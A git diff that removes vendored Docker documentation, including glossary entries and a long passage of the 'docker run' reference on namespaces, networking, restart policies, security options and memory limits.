- -## link - -links provide a legacy interface to connect Docker containers running on the -same host to each other without exposing the hosts' network ports. Use the -Docker networks feature instead. - -## Machine - -[Machine](https://github.com/docker/machine) is a Docker tool which -makes it really easy to create Docker hosts on your computer, on -cloud providers and inside your own data center. It creates servers, -installs Docker on them, then configures the Docker client to talk to them. - -*Also known as : docker-machine* - -## node - -A [node](https://docs.docker.com/engine/swarm/how-swarm-mode-works/nodes/) is a physical or virtual -machine running an instance of the Docker Engine in swarm mode. - -**Manager nodes** perform swarm management and orchestration duties. By default -manager nodes are also worker nodes. - -**Worker nodes** execute tasks. - -## overlay network driver - -Overlay network driver provides out of the box multi-host network connectivity -for docker containers in a cluster. - -## overlay storage driver - -OverlayFS is a [filesystem](#filesystem) service for Linux which implements a -[union mount](http://en.wikipedia.org/wiki/Union_mount) for other file systems. -It is supported by the Docker daemon as a storage driver. - -## registry - -A Registry is a hosted service containing [repositories](#repository) of [images](#image) -which responds to the Registry API. - -The default registry can be accessed using a browser at [Docker Hub](#docker-hub) -or using the `docker search` command. - -## repository - -A repository is a set of Docker images. A repository can be shared by pushing it -to a [registry](#registry) server. The different images in the repository can be -labeled using [tags](#tag). 
- -Here is an example of the shared [nginx repository](https://hub.docker.com/_/nginx/) -and its [tags](https://hub.docker.com/r/library/nginx/tags/) - - -## service - -A [service](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/) is the definition of how -you want to run your application containers in a swarm. At the most basic level -a service defines which container image to run in the swarm and which commands -to run in the container. For orchestration purposes, the service defines the -"desired state", meaning how many containers to run as tasks and constraints for -deploying the containers. - -Frequently a service is a microservice within the context of some larger -application. Examples of services might include an HTTP server, a database, or -any other type of executable program that you wish to run in a distributed -environment. - -## service discovery - -Swarm mode [service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery) is a DNS component -internal to the swarm that automatically assigns each service on an overlay -network in the swarm a VIP and DNS entry. Containers on the network share DNS -mappings for the service via gossip so any container on the network can access -the service via its service name. - -You don’t need to expose service-specific ports to make the service available to -other services on the same overlay network. The swarm’s internal load balancer -automatically distributes requests to the service VIP among the active tasks. - -## swarm - -A [swarm](https://docs.docker.com/engine/swarm/) is a cluster of one or more Docker Engines running in [swarm mode](#swarm-mode). - -## Docker Swarm - -Do not confuse [Docker Swarm](https://github.com/docker/swarm) with the [swarm mode](#swarm-mode) features in Docker Engine. - -Docker Swarm is the name of a standalone native clustering tool for Docker. 
-Docker Swarm pools together several Docker hosts and exposes them as a single -virtual Docker host. It serves the standard Docker API, so any tool that already -works with Docker can now transparently scale up to multiple hosts. - -*Also known as : docker-swarm* - -## swarm mode - -[Swarm mode](https://docs.docker.com/engine/swarm/) refers to cluster management and orchestration -features embedded in Docker Engine. When you initialize a new swarm (cluster) or -join nodes to a swarm, the Docker Engine runs in swarm mode. - -## tag - -A tag is a label applied to a Docker image in a [repository](#repository). -tags are how various images in a repository are distinguished from each other. - -*Note : This label is not related to the key=value labels set for docker daemon* - -## task - -A [task](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/#/tasks-and-scheduling) is the -atomic unit of scheduling within a swarm. A task carries a Docker container and -the commands to run inside the container. Manager nodes assign tasks to worker -nodes according to the number of replicas set in the service scale. - -The diagram below illustrates the relationship of services to tasks and -containers. - -![services diagram](https://docs.docker.com/engine/swarm/images/services-diagram.png) - -## Toolbox - -Docker Toolbox is the installer for Mac and Windows users. - - -## Union file system - -Union file systems, or UnionFS, are file systems that operate by creating layers, making them -very lightweight and fast. Docker uses union file systems to provide the building -blocks for containers. - - -## virtual machine - -A virtual machine is a program that emulates a complete computer and imitates dedicated hardware. -It shares physical hardware resources with other users but isolates the operating system. The -end user has the same experience on a Virtual Machine as they would have on dedicated hardware. 
- -Compared to containers, a virtual machine is heavier to run, provides more isolation, -gets its own set of resources and does minimal sharing. - -*Also known as : VM* diff --git a/vendor/github.com/docker/docker/docs/reference/index.md b/vendor/github.com/docker/docker/docs/reference/index.md deleted file mode 100644 index f24c342dfc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/index.md +++ /dev/null @@ -1,21 +0,0 @@ ---- -title: "Engine reference" -description: "Docker Engine reference" -keywords: "Engine" ---- - - - -# Engine reference - -* [Dockerfile reference](builder.md) -* [Docker run reference](run.md) -* [Command line reference](commandline/index.md) -* [API Reference](https://docs.docker.com/engine/api/) diff --git a/vendor/github.com/docker/docker/docs/reference/run.md b/vendor/github.com/docker/docker/docs/reference/run.md deleted file mode 100644 index 73769ed610..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/run.md +++ /dev/null @@ -1,1555 +0,0 @@ ---- -title: "Docker run reference" -description: "Configure containers at runtime" -keywords: "docker, run, configure, runtime" ---- - - - -# Docker run reference - -Docker runs processes in isolated containers. A container is a process -which runs on a host. The host may be local or remote. When an operator -executes `docker run`, the container process that runs is isolated in -that it has its own file system, its own networking, and its own -isolated process tree separate from the host. - -This page details how to use the `docker run` command to define the -container's resources at runtime. - -## General form - -The basic `docker run` command takes this form: - - $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] - -The `docker run` command must specify an [*IMAGE*](glossary.md#image) -to derive the container from. 
An image developer can define image -defaults related to: - - * detached or foreground running - * container identification - * network settings - * runtime constraints on CPU and memory - -With the `docker run [OPTIONS]` an operator can add to or override the -image defaults set by a developer. And, additionally, operators can -override nearly all the defaults set by the Docker runtime itself. The -operator's ability to override image and Docker runtime defaults is why -[*run*](commandline/run.md) has more options than any -other `docker` command. - -To learn how to interpret the types of `[OPTIONS]`, see [*Option -types*](commandline/cli.md#option-types). - -> **Note**: Depending on your Docker system configuration, you may be -> required to preface the `docker run` command with `sudo`. To avoid -> having to use `sudo` with the `docker` command, your system -> administrator can create a Unix group called `docker` and add users to -> it. For more information about this configuration, refer to the Docker -> installation documentation for your operating system. - - -## Operator exclusive options - -Only the operator (the person executing `docker run`) can set the -following options. 
- - - [Detached vs foreground](#detached-vs-foreground) - - [Detached (-d)](#detached--d) - - [Foreground](#foreground) - - [Container identification](#container-identification) - - [Name (--name)](#name---name) - - [PID equivalent](#pid-equivalent) - - [IPC settings (--ipc)](#ipc-settings---ipc) - - [Network settings](#network-settings) - - [Restart policies (--restart)](#restart-policies---restart) - - [Clean up (--rm)](#clean-up---rm) - - [Runtime constraints on resources](#runtime-constraints-on-resources) - - [Runtime privilege and Linux capabilities](#runtime-privilege-and-linux-capabilities) - -## Detached vs foreground - -When starting a Docker container, you must first decide if you want to -run the container in the background in a "detached" mode or in the -default foreground mode: - - -d=false: Detached mode: Run container in the background, print new container id - -### Detached (-d) - -To start a container in detached mode, you use `-d=true` or just `-d` option. By -design, containers started in detached mode exit when the root process used to -run the container exits. A container in detached mode cannot be automatically -removed when it stops, this means you cannot use the `--rm` option with `-d` option. - -Do not pass a `service x start` command to a detached container. For example, this -command attempts to start the `nginx` service. - - $ docker run -d -p 80:80 my_image service nginx start - -This succeeds in starting the `nginx` service inside the container. However, it -fails the detached container paradigm in that, the root process (`service nginx -start`) returns and the detached container stops as designed. As a result, the -`nginx` service is started but could not be used. Instead, to start a process -such as the `nginx` web server do the following: - - $ docker run -d -p 80:80 my_image nginx -g 'daemon off;' - -To do input/output with a detached container use network connections or shared -volumes. 
These are required because the container is no longer listening to the -command line where `docker run` was run. - -To reattach to a detached container, use `docker` -[*attach*](commandline/attach.md) command. - -### Foreground - -In foreground mode (the default when `-d` is not specified), `docker -run` can start the process in the container and attach the console to -the process's standard input, output, and standard error. It can even -pretend to be a TTY (this is what most command line executables expect) -and pass along signals. All of that is configurable: - - -a=[] : Attach to `STDIN`, `STDOUT` and/or `STDERR` - -t : Allocate a pseudo-tty - --sig-proxy=true: Proxy all received signals to the process (non-TTY mode only) - -i : Keep STDIN open even if not attached - -If you do not specify `-a` then Docker will [attach to both stdout and stderr -]( https://github.com/docker/docker/blob/4118e0c9eebda2412a09ae66e90c34b85fae3275/runconfig/opts/parse.go#L267). -You can specify to which of the three standard streams (`STDIN`, `STDOUT`, -`STDERR`) you'd like to connect instead, as in: - - $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash - -For interactive processes (like a shell), you must use `-i -t` together in -order to allocate a tty for the container process. `-i -t` is often written `-it` -as you'll see in later examples. Specifying `-t` is forbidden when the client -standard output is redirected or piped, such as in: - - $ echo test | docker run -i busybox cat - ->**Note**: A process running as PID 1 inside a container is treated ->specially by Linux: it ignores any signal with the default action. ->So, the process will not terminate on `SIGINT` or `SIGTERM` unless it is ->coded to do so. 
- -## Container identification - -### Name (--name) - -The operator can identify a container in three ways: - -| Identifier type | Example value | -| --------------------- | ------------------------------------------------------------------ | -| UUID long identifier | "f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778" | -| UUID short identifier | "f78375b1c487" | -| Name | "evil_ptolemy" | - -The UUID identifiers come from the Docker daemon. If you do not assign a -container name with the `--name` option, then the daemon generates a random -string name for you. Defining a `name` can be a handy way to add meaning to a -container. If you specify a `name`, you can use it when referencing the -container within a Docker network. This works for both background and foreground -Docker containers. - -> **Note**: Containers on the default bridge network must be linked to -> communicate by name. - -### PID equivalent - -Finally, to help with automation, you can have Docker write the -container ID out to a file of your choosing. This is similar to how some -programs might write out their process ID to a file (you've seen them as -PID files): - - --cidfile="": Write the container ID to the file - -### Image[:tag] - -While not strictly a means of identifying a container, you can specify a version of an -image you'd like to run the container with by adding `image[:tag]` to the command. For -example, `docker run ubuntu:14.04`. - -### Image[@digest] - -Images using the v2 or later image format have a content-addressable identifier -called a digest. As long as the input used to generate the image is unchanged, -the digest value is predictable and referenceable. 
- -The following example runs a container from the `alpine` image with the -`sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0` digest: - - $ docker run alpine@sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0 date - -## PID settings (--pid) - - --pid="" : Set the PID (Process) Namespace mode for the container, - 'container:': joins another container's PID namespace - 'host': use the host's PID namespace inside the container - -By default, all containers have the PID namespace enabled. - -PID namespace provides separation of processes. The PID Namespace removes the -view of the system processes, and allows process ids to be reused including -pid 1. - -In certain cases you want your container to share the host's process namespace, -basically allowing processes within the container to see all of the processes -on the system. For example, you could build a container with debugging tools -like `strace` or `gdb`, but want to use these tools when debugging processes -within the container. - -### Example: run htop inside a container - -Create this Dockerfile: - -``` -FROM alpine:latest -RUN apk add --update htop && rm -rf /var/cache/apk/* -CMD ["htop"] -``` - -Build the Dockerfile and tag the image as `myhtop`: - -```bash -$ docker build -t myhtop . -``` - -Use the following command to run `htop` inside a container: - -``` -$ docker run -it --rm --pid=host myhtop -``` - -Joining another container's pid namespace can be used for debugging that container. 
- -### Example - -Start a container running a redis server: - -```bash -$ docker run --name my-redis -d redis -``` - -Debug the redis container by running another container that has strace in it: - -```bash -$ docker run -it --pid=container:my-redis my_strace_docker_image bash -$ strace -p 1 -``` - -## UTS settings (--uts) - - --uts="" : Set the UTS namespace mode for the container, - 'host': use the host's UTS namespace inside the container - -The UTS namespace is for setting the hostname and the domain that is visible -to running processes in that namespace. By default, all containers, including -those with `--network=host`, have their own UTS namespace. The `host` setting will -result in the container using the same UTS namespace as the host. Note that -`--hostname` is invalid in `host` UTS mode. - -You may wish to share the UTS namespace with the host if you would like the -hostname of the container to change as the hostname of the host changes. A -more advanced use case would be changing the host's hostname from a container. - -## IPC settings (--ipc) - - --ipc="" : Set the IPC mode for the container, - 'container:': reuses another container's IPC namespace - 'host': use the host's IPC namespace inside the container - -By default, all containers have the IPC namespace enabled. - -IPC (POSIX/SysV IPC) namespace provides separation of named shared memory -segments, semaphores and message queues. - -Shared memory segments are used to accelerate inter-process communication at -memory speed, rather than through pipes or through the network stack. Shared -memory is commonly used by databases and custom-built (typically C/OpenMPI, -C++/using boost libraries) high performance applications for scientific -computing and financial services industries. If these types of applications -are broken into multiple containers, you might need to share the IPC mechanisms -of the containers. 
- -## Network settings - - --dns=[] : Set custom dns servers for the container - --network="bridge" : Connect a container to a network - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --network-alias=[] : Add network-scoped alias for the container - --add-host="" : Add a line to /etc/hosts (host:IP) - --mac-address="" : Sets the container's Ethernet device's MAC address - --ip="" : Sets the container's Ethernet device's IPv4 address - --ip6="" : Sets the container's Ethernet device's IPv6 address - --link-local-ip=[] : Sets one or more container's Ethernet device's link local IPv4/IPv6 addresses - -By default, all containers have networking enabled and they can make any -outgoing connections. The operator can completely disable networking -with `docker run --network none` which disables all incoming and outgoing -networking. In cases like this, you would perform I/O through files or -`STDIN` and `STDOUT` only. - -Publishing ports and linking to other containers only works with the default (bridge). The linking feature is a legacy feature. You should always prefer using Docker network drivers over linking. - -Your container will use the same DNS servers as the host by default, but -you can override this with `--dns`. - -By default, the MAC address is generated using the IP address allocated to the -container. You can set the container's MAC address explicitly by providing a -MAC address via the `--mac-address` parameter (format:`12:34:56:78:9a:bc`).Be -aware that Docker does not check if manually specified MAC addresses are unique. - -Supported networks : - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
NetworkDescription
none - No networking in the container. -
bridge (default) - Connect the container to the bridge via veth interfaces. -
host - Use the host's network stack inside the container. -
container:<name|id> - Use the network stack of another container, specified via - its name or id. -
NETWORK - Connects the container to a user created network (using docker network create command) -
- -#### Network: none - -With the network set to `none` a container will not have -access to any external routes. The container will still have a -`loopback` interface enabled in the container but it does not have any -routes to external traffic. - -#### Network: bridge - -With the network set to `bridge` a container will use docker's -default networking setup. A bridge is set up on the host, commonly named -`docker0`, and a pair of `veth` interfaces will be created for the -container. One side of the `veth` pair will remain on the host attached -to the bridge while the other side of the pair will be placed inside the -container's namespaces in addition to the `loopback` interface. An IP -address will be allocated for containers on the bridge's network and -traffic will be routed through this bridge to the container. - -Containers can communicate via their IP addresses by default. To communicate by -name, they must be linked. - -#### Network: host - -With the network set to `host` a container will share the host's -network stack and all interfaces from the host will be available to the -container. The container's hostname will match the hostname on the host -system. Note that `--mac-address` is invalid in `host` netmode. Even in `host` -network mode a container has its own UTS namespace by default. As such -`--hostname` is allowed in `host` network mode and will only change the -hostname inside the container. -Similar to `--hostname`, the `--add-host`, `--dns`, `--dns-search`, and -`--dns-option` options can be used in `host` network mode. These options update -`/etc/hosts` or `/etc/resolv.conf` inside the container. No changes are made to -`/etc/hosts` and `/etc/resolv.conf` on the host. - -Compared to the default `bridge` mode, the `host` mode gives *significantly* -better networking performance since it uses the host's native networking stack -whereas the bridge has to go through one level of virtualization through the -docker daemon. 
It is recommended to run containers in this mode when their -networking performance is critical, for example, a production Load Balancer -or a High Performance Web Server. - -> **Note**: `--network="host"` gives the container full access to local system -> services such as D-bus and is therefore considered insecure. - -#### Network: container - -With the network set to `container` a container will share the -network stack of another container. The other container's name must be -provided in the format of `--network container:`. Note that `--add-host` -`--hostname` `--dns` `--dns-search` `--dns-option` and `--mac-address` are -invalid in `container` netmode, and `--publish` `--publish-all` `--expose` are -also invalid in `container` netmode. - -Example running a Redis container with Redis binding to `localhost` then -running the `redis-cli` command and connecting to the Redis server over the -`localhost` interface. - - $ docker run -d --name redis example/redis --bind 127.0.0.1 - $ # use the redis container's network stack to access localhost - $ docker run --rm -it --network container:redis example/redis-cli -h 127.0.0.1 - -#### User-defined network - -You can create a network using a Docker network driver or an external network -driver plugin. You can connect multiple containers to the same network. Once -connected to a user-defined network, the containers can communicate easily using -only another container's IP address or name. - -For `overlay` networks or custom plugins that support multi-host connectivity, -containers connected to the same multi-host network but launched from different -Engines can also communicate in this way. 
- -The following example creates a network using the built-in `bridge` network -driver and running a container in the created network - -``` -$ docker network create -d bridge my-net -$ docker run --network=my-net -itd --name=container3 busybox -``` - -### Managing /etc/hosts - -Your container will have lines in `/etc/hosts` which define the hostname of the -container itself as well as `localhost` and a few other common things. The -`--add-host` flag can be used to add additional lines to `/etc/hosts`. - - $ docker run -it --add-host db-static:86.75.30.9 ubuntu cat /etc/hosts - 172.17.0.22 09d03f76bf2c - fe00::0 ip6-localnet - ff00::0 ip6-mcastprefix - ff02::1 ip6-allnodes - ff02::2 ip6-allrouters - 127.0.0.1 localhost - ::1 localhost ip6-localhost ip6-loopback - 86.75.30.9 db-static - -If a container is connected to the default bridge network and `linked` -with other containers, then the container's `/etc/hosts` file is updated -with the linked container's name. - -If the container is connected to user-defined network, the container's -`/etc/hosts` file is updated with names of all other containers in that -user-defined network. - -> **Note** Since Docker may live update the container’s `/etc/hosts` file, there -may be situations when processes inside the container can end up reading an -empty or incomplete `/etc/hosts` file. In most cases, retrying the read again -should fix the problem. - -## Restart policies (--restart) - -Using the `--restart` flag on Docker run you can specify a restart policy for -how a container should or should not be restarted on exit. - -When a restart policy is active on a container, it will be shown as either `Up` -or `Restarting` in [`docker ps`](commandline/ps.md). It can also be -useful to use [`docker events`](commandline/events.md) to see the -restart policy in effect. - -Docker supports the following restart policies: - - - - - - - - - - - - - - - - - - - - - - - - - - -
PolicyResult
no - Do not automatically restart the container when it exits. This is the - default. -
- - on-failure[:max-retries] - - - Restart only if the container exits with a non-zero exit status. - Optionally, limit the number of restart retries the Docker - daemon attempts. -
always - Always restart the container regardless of the exit status. - When you specify always, the Docker daemon will try to restart - the container indefinitely. The container will also always start - on daemon startup, regardless of the current state of the container. -
unless-stopped - Always restart the container regardless of the exit status, but - do not start it on daemon startup if the container has been put - to a stopped state before. -
- -An ever increasing delay (double the previous delay, starting at 100 -milliseconds) is added before each restart to prevent flooding the server. -This means the daemon will wait for 100 ms, then 200 ms, 400, 800, 1600, -and so on until either the `on-failure` limit is hit, or when you `docker stop` -or `docker rm -f` the container. - -If a container is successfully restarted (the container is started and runs -for at least 10 seconds), the delay is reset to its default value of 100 ms. - -You can specify the maximum amount of times Docker will try to restart the -container when using the **on-failure** policy. The default is that Docker -will try forever to restart the container. The number of (attempted) restarts -for a container can be obtained via [`docker inspect`](commandline/inspect.md). For example, to get the number of restarts -for container "my-container"; - - {% raw %} - $ docker inspect -f "{{ .RestartCount }}" my-container - # 2 - {% endraw %} - -Or, to get the last time the container was (re)started; - - {% raw %} - $ docker inspect -f "{{ .State.StartedAt }}" my-container - # 2015-03-04T23:47:07.691840179Z - {% endraw %} - - -Combining `--restart` (restart policy) with the `--rm` (clean up) flag results -in an error. On container restart, attached clients are disconnected. See the -examples on using the [`--rm` (clean up)](#clean-up-rm) flag later in this page. - -### Examples - - $ docker run --restart=always redis - -This will run the `redis` container with a restart policy of **always** -so that if the container exits, Docker will restart it. - - $ docker run --restart=on-failure:10 redis - -This will run the `redis` container with a restart policy of **on-failure** -and a maximum restart count of 10. If the `redis` container exits with a -non-zero exit status more than 10 times in a row Docker will abort trying to -restart the container. Providing a maximum restart limit is only valid for the -**on-failure** policy. 
- -## Exit Status - -The exit code from `docker run` gives information about why the container -failed to run or why it exited. When `docker run` exits with a non-zero code, -the exit codes follow the `chroot` standard, see below: - -**_125_** if the error is with Docker daemon **_itself_** - - $ docker run --foo busybox; echo $? - # flag provided but not defined: --foo - See 'docker run --help'. - 125 - -**_126_** if the **_contained command_** cannot be invoked - - $ docker run busybox /etc; echo $? - # docker: Error response from daemon: Container command '/etc' could not be invoked. - 126 - -**_127_** if the **_contained command_** cannot be found - - $ docker run busybox foo; echo $? - # docker: Error response from daemon: Container command 'foo' not found or does not exist. - 127 - -**_Exit code_** of **_contained command_** otherwise - - $ docker run busybox /bin/sh -c 'exit 3'; echo $? - # 3 - -## Clean up (--rm) - -By default a container's file system persists even after the container -exits. This makes debugging a lot easier (since you can inspect the -final state) and you retain all your data by default. But if you are -running short-term **foreground** processes, these container file -systems can really pile up. If instead you'd like Docker to -**automatically clean up the container and remove the file system when -the container exits**, you can add the `--rm` flag: - - --rm=false: Automatically remove the container when it exits (incompatible with -d) - -> **Note**: When you set the `--rm` flag, Docker also removes the volumes -associated with the container when the container is removed. This is similar -to running `docker rm -v my-container`. Only volumes that are specified without a -name are removed. For example, with -`docker run --rm -v /foo -v awesome:/bar busybox top`, the volume for `/foo` will be removed, -but the volume for `/bar` will not. 
Volumes inherited via `--volumes-from` will be removed -with the same logic -- if the original volume was specified with a name it will **not** be removed. - -## Security configuration - --security-opt="label=user:USER" : Set the label user for the container - --security-opt="label=role:ROLE" : Set the label role for the container - --security-opt="label=type:TYPE" : Set the label type for the container - --security-opt="label=level:LEVEL" : Set the label level for the container - --security-opt="label=disable" : Turn off label confinement for the container - --security-opt="apparmor=PROFILE" : Set the apparmor profile to be applied to the container - --security-opt="no-new-privileges" : Disable container processes from gaining new privileges - --security-opt="seccomp=unconfined" : Turn off seccomp confinement for the container - --security-opt="seccomp=profile.json": White listed syscalls seccomp Json file to be used as a seccomp filter - - -You can override the default labeling scheme for each container by specifying -the `--security-opt` flag. Specifying the level in the following command -allows you to share the same content between containers. - - $ docker run --security-opt label=level:s0:c100,c200 -it fedora bash - -> **Note**: Automatic translation of MLS labels is not currently supported. - -To disable the security labeling for this container versus running with the -`--privileged` flag, use the following command: - - $ docker run --security-opt label=disable -it fedora bash - -If you want a tighter security policy on the processes within a container, -you can specify an alternate type for the container. You could run a container -that is only allowed to listen on Apache ports by executing the following -command: - - $ docker run --security-opt label=type:svirt_apache_t -it centos bash - -> **Note**: You would have to write policy defining a `svirt_apache_t` type. 
- -If you want to prevent your container processes from gaining additional -privileges, you can execute the following command: - - $ docker run --security-opt no-new-privileges -it centos bash - -This means that commands that raise privileges such as `su` or `sudo` will no longer work. -It also causes any seccomp filters to be applied later, after privileges have been dropped -which may mean you can have a more restrictive set of filters. -For more details, see the [kernel documentation](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt). - -## Specifying custom cgroups - -Using the `--cgroup-parent` flag, you can pass a specific cgroup to run a -container in. This allows you to create and manage cgroups on their own. You can -define custom resources for those cgroups and put containers under a common -parent group. - -## Runtime constraints on resources - -The operator can also adjust the performance parameters of the -container: - -| Option | Description | -| -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- | -| `-m`, `--memory=""` | Memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | -| `--memory-swap=""` | Total memory limit (memory + swap, format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | -| `--memory-reservation=""` | Memory soft limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | -| `--kernel-memory=""` | Kernel memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | -| `-c`, `--cpu-shares=0` | CPU shares (relative weight) | -| `--cpus=0.000` | Number of CPUs. Number is a fractional number. 0.000 means no limit. 
| -| `--cpu-period=0` | Limit the CPU CFS (Completely Fair Scheduler) period | -| `--cpuset-cpus=""` | CPUs in which to allow execution (0-3, 0,1) | -| `--cpuset-mems=""` | Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. | -| `--cpu-quota=0` | Limit the CPU CFS (Completely Fair Scheduler) quota | -| `--cpu-rt-period=0` | Limit the CPU real-time period. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | -| `--cpu-rt-runtime=0` | Limit the CPU real-time runtime. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | -| `--blkio-weight=0` | Block IO weight (relative weight) accepts a weight value between 10 and 1000. | -| `--blkio-weight-device=""` | Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`) | -| `--device-read-bps=""` | Limit read rate from a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | -| `--device-write-bps=""` | Limit write rate to a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | -| `--device-read-iops="" ` | Limit read rate (IO per second) from a device (format: `:`). Number is a positive integer. | -| `--device-write-iops="" ` | Limit write rate (IO per second) to a device (format: `:`). Number is a positive integer. | -| `--oom-kill-disable=false` | Whether to disable OOM Killer for the container or not. | -| `--oom-score-adj=0` | Tune container's OOM preferences (-1000 to 1000) | -| `--memory-swappiness=""` | Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. | -| `--shm-size=""` | Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. 
| - -### User memory constraints - -We have four ways to set user memory usage: - - - - - - - - - - - - - - - - - - - - - - - - - - -
OptionResult
- memory=inf, memory-swap=inf (default) - - There is no memory limit for the container. The container can use - as much memory as needed. -
memory=L<inf, memory-swap=inf - (specify memory and set memory-swap as -1) The container is - not allowed to use more than L bytes of memory, but can use as much swap - as is needed (if the host supports swap memory). -
memory=L<inf, memory-swap=2*L - (specify memory without memory-swap) The container is not allowed to - use more than L bytes of memory, swap plus memory usage is double - of that. -
- memory=L<inf, memory-swap=S<inf, L<=S - - (specify both memory and memory-swap) The container is not allowed to - use more than L bytes of memory, swap plus memory usage is limited - by S. -
- -Examples: - - $ docker run -it ubuntu:14.04 /bin/bash - -We set nothing about memory, this means the processes in the container can use -as much memory and swap memory as they need. - - $ docker run -it -m 300M --memory-swap -1 ubuntu:14.04 /bin/bash - -We set memory limit and disabled swap memory limit, this means the processes in -the container can use 300M memory and as much swap memory as they need (if the -host supports swap memory). - - $ docker run -it -m 300M ubuntu:14.04 /bin/bash - -We set memory limit only, this means the processes in the container can use -300M memory and 300M swap memory, by default, the total virtual memory size -(--memory-swap) will be set as double of memory, in this case, memory + swap -would be 2*300M, so processes can use 300M swap memory as well. - - $ docker run -it -m 300M --memory-swap 1G ubuntu:14.04 /bin/bash - -We set both memory and swap memory, so the processes in the container can use -300M memory and 700M swap memory. - -Memory reservation is a kind of memory soft limit that allows for greater -sharing of memory. Under normal circumstances, containers can use as much of -the memory as needed and are constrained only by the hard limits set with the -`-m`/`--memory` option. When memory reservation is set, Docker detects memory -contention or low memory and forces containers to restrict their consumption to -a reservation limit. - -Always set the memory reservation value below the hard limit, otherwise the hard -limit takes precedence. A reservation of 0 is the same as setting no -reservation. By default (without reservation set), memory reservation is the -same as the hard memory limit. - -Memory reservation is a soft-limit feature and does not guarantee the limit -won't be exceeded. Instead, the feature attempts to ensure that, when memory is -heavily contended for, memory is allocated based on the reservation hints/setup. 
- -The following example limits the memory (`-m`) to 500M and sets the memory -reservation to 200M. - -```bash -$ docker run -it -m 500M --memory-reservation 200M ubuntu:14.04 /bin/bash -``` - -Under this configuration, when the container consumes memory more than 200M and -less than 500M, the next system memory reclaim attempts to shrink container -memory below 200M. - -The following example sets memory reservation to 1G without a hard memory limit. - -```bash -$ docker run -it --memory-reservation 1G ubuntu:14.04 /bin/bash -``` - -The container can use as much memory as it needs. The memory reservation setting -ensures the container doesn't consume too much memory for a long time, because -every memory reclaim shrinks the container's consumption to the reservation. - -By default, kernel kills processes in a container if an out-of-memory (OOM) -error occurs. To change this behaviour, use the `--oom-kill-disable` option. -Only disable the OOM killer on containers where you have also set the -`-m/--memory` option. If the `-m` flag is not set, this can result in the host -running out of memory and require killing the host's system processes to free -memory. - -The following example limits the memory to 100M and disables the OOM killer for -this container: - - $ docker run -it -m 100M --oom-kill-disable ubuntu:14.04 /bin/bash - -The following example illustrates a dangerous way to use the flag: - - $ docker run -it --oom-kill-disable ubuntu:14.04 /bin/bash - -The container has unlimited memory which can cause the host to run out of memory -and require killing system processes to free memory. The `--oom-score-adj` -parameter can be changed to select the priority of which containers will -be killed when the system is out of memory, with negative scores making them -less likely to be killed and positive more likely. - -### Kernel memory constraints - -Kernel memory is fundamentally different than user memory as kernel memory can't -be swapped out. 
The inability to swap makes it possible for the container to -block system services by consuming too much kernel memory. Kernel memory includes: - - - stack pages - - slab pages - - sockets memory pressure - - tcp memory pressure - -You can setup kernel memory limit to constrain these kinds of memory. For example, -every process consumes some stack pages. By limiting kernel memory, you can -prevent new processes from being created when the kernel memory usage is too high. - -Kernel memory is never completely independent of user memory. Instead, you limit -kernel memory in the context of the user memory limit. Assume "U" is the user memory -limit and "K" the kernel limit. There are three possible ways to set limits: - - - - - - - - - - - - - - - - - - - - - - -
OptionResult
U != 0, K = inf (default) - This is the standard memory limitation mechanism already present before using - kernel memory. Kernel memory is completely ignored. -
U != 0, K < U - Kernel memory is a subset of the user memory. This setup is useful in - deployments where the total amount of memory per-cgroup is overcommitted. - Overcommitting kernel memory limits is definitely not recommended, since the - box can still run out of non-reclaimable memory. - In this case, you can configure K so that the sum of all groups is - never greater than the total memory. Then, freely set U at the expense of - the system's service quality. -
U != 0, K > U - Since kernel memory charges are also fed to the user counter and reclamation - is triggered for the container for both kinds of memory. This configuration - gives the admin a unified view of memory. It is also useful for people - who just want to track kernel memory usage. -
